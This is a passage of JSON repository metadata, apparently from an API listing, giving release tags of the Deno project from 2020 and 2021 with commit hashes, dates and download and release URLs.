.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.6